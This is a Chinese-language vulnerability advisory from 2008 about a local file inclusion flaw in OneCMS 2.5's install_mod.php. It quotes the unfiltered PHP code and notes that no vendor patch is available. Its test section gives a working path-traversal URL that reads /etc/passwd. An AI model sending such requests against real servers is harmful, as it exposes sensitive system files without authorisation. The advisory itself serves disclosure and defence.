OneCMS load参数本地文件包含漏洞
发布日期:2008-05-26
更新日期:2008-05-27
受影响系统:insanevisions OneCMS 2.5
描述:
BUGTRAQ ID:
29374
OneCMS是为网络游戏站点设计的内容管理系统。
OneCMS实现上存在输入验证漏洞,远程攻击者可以通过提交恶意的HTTP请求包含本地资源的任意文件,导致泄露敏感信息。
当act设置为go的时候,OneCMS的install_mod.php文件中没有正确过滤对load参数的输入便用于包含文件:
$mod = $_GET['load'];
$filexp = explode(".", $mod);
$filetype = $filexp[1];
$file = $filexp[0];
$file2 = "mods/$mod";
if (!is_numeric($mod)) { // makes sure that the user isnt entering a #
if ($filetype == "php") {
if ($_GET['act'] == "") {
echo "Are you sure you would like to install the <b>".$file."</b> module?<br><a href='install_mod.php?load=".$mod."&act=go'>Yes</a>";
}
if ($_GET['act'] == "go") {
include ($file2);
...
<*来源:Digital Security Research Group
链接:
http://secunia.com/advisories/30378/
http://milw0rm.com/exploits/5669
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[server]/[installdir]/install_mod.php?act=go&load=1234.php../../../../../../../../../../../../../etc/passwd
建议:
厂商补丁:
insanevisions
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/project/showfiles.php?group_id=148948浏览次数:2356
严重程度:0(网友投票)